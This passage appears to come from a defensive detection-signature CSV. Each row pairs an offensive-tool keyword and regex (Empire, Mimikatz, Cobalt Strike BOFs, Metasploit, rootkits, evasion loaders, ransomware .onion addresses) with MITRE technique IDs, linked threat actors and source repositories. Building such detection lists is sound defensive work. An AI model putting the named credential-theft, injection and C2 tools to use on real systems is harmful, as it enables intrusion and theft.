"*Import-DllImports*",".{0,1000}Import\-DllImports.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48415"
"*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48416"
"*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48417"
"*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48418"
"*Importedx765ant Fileedx765s/Proedx765file*",".{0,1000}Importedx765ant\sFileedx765s\/Proedx765file.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","48419"
"*Import-Module */PView.psm1*",".{0,1000}Import\-Module\s.{0,1000}\/PView\.psm1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","48420"
"*Import-Module *Microsoft.ActiveDirectory.Management.dll*",".{0,1000}Import\-Module\s.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","0","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","48422"
"*Import-Module DSInternals*",".{0,1000}Import\-Module\sDSInternals.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","48424"
"*import-module psinject.ps1*",".{0,1000}import\-module\spsinject\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","48425"
"*Import-PhishWinLib*",".{0,1000}Import\-PhishWinLib.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48426"
"*improsec/SharpEventPersist*",".{0,1000}improsec\/SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","48427"
"*In medium integrity but user is a local administrator- UAC can be bypassed*",".{0,1000}In\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","48428"
"*In medium integrity but user is a local administrator- UAC can be bypassed*",".{0,1000}In\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","48429"
"*In memory of all those murdered in the Nova party massacre 7.10.2023*",".{0,1000}In\smemory\sof\sall\sthose\smurdered\sin\sthe\sNova\sparty\smassacre\s7\.10\.2023.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","48430"
"*in.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}in\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","48431"
"*Inactive Domain Admins Honey Tokens*",".{0,1000}Inactive\sDomain\sAdmins\sHoney\sTokens.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","48432"
"*inbukcc4xk67uzbgkzufdqq3q3ikhwtebqxza5zlfbtzwm2g6usxidqd.onion*",".{0,1000}inbukcc4xk67uzbgkzufdqq3q3ikhwtebqxza5zlfbtzwm2g6usxidqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48433"
"*Incarnadine_devil@hotmail.com*",".{0,1000}Incarnadine_devil\@hotmail\.com.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#email","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","48435"
"*incblog6qu4y4mm4zvw5nrmue6qbwtgjsxpw6b7ixzssu36tsajldoad.onion*",".{0,1000}incblog6qu4y4mm4zvw5nrmue6qbwtgjsxpw6b7ixzssu36tsajldoad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48436"
"*incblog7vmuq7rktic73r4ha4j757m3ptym37tyvifzp2roedyyzzxid.onion*",".{0,1000}incblog7vmuq7rktic73r4ha4j757m3ptym37tyvifzp2roedyyzzxid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48437"
"*inceptor*POWERSHELL*",".{0,1000}inceptor.{0,1000}POWERSHELL.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48438"
"*inceptor.py *",".{0,1000}inceptor\.py\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48439"
"*inceptor/obfuscators*",".{0,1000}inceptor\/obfuscators.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48440"
"*inceptor-main.zip*",".{0,1000}inceptor\-main\.zip.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48441"
"*include ""MSFRottenPotato.h""*",".{0,1000}include\s\""MSFRottenPotato\.h\"".{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","48442"
"*include ""prefetch_leak.h""*",".{0,1000}include\s\""prefetch_leak\.h\"".{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","48443"
"*include ""ThrowbackDLL.h""*",".{0,1000}include\s\""ThrowbackDLL\.h\"".{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","48444"
"*include *Nidhogg.hpp*",".{0,1000}include\s.{0,1000}Nidhogg\.hpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","48445"
"*include beacon.h*",".{0,1000}include\sbeacon\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","48446"
"*include injection.c*",".{0,1000}include\sinjection\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","48447"
"*include Msf::Exploit::Remote::HttpServer*",".{0,1000}include\sMsf\:\:Exploit\:\:Remote\:\:HttpServer.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48448"
"*include*bofmask.h*",".{0,1000}include.{0,1000}bofmask\.h.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","48449"
"*incognito* list_tokens -u*",".{0,1000}incognito.{0,1000}\slist_tokens\s\-u.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48450"
"*incognito.exe*",".{0,1000}incognito\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48451"
"*incpaykabjqc2mtdxq6c23nqh4x6m5dkps5fr6vgdkgzp5njssx6qkid.onion*",".{0,1000}incpaykabjqc2mtdxq6c23nqh4x6m5dkps5fr6vgdkgzp5njssx6qkid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48454"
"*incpaysp74dphcbjyvg2eepxnl3tkgt5mq5vd4tnjusoissz342bdnad.onion*",".{0,1000}incpaysp74dphcbjyvg2eepxnl3tkgt5mq5vd4tnjusoissz342bdnad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48455"
"*Indestructible7/Imminent-Monitor*",".{0,1000}Indestructible7\/Imminent\-Monitor.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","1","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","48456"
"*inexorableposh.exe*",".{0,1000}inexorableposh\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","48457"
"*infection_monkey.py*",".{0,1000}infection_monkey\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","48458"
"*InflativeLoading.py *",".{0,1000}InflativeLoading\.py\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","48459"
"*InflativeLoading-DumpPEFromMemory*",".{0,1000}InflativeLoading\-DumpPEFromMemory.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","48460"
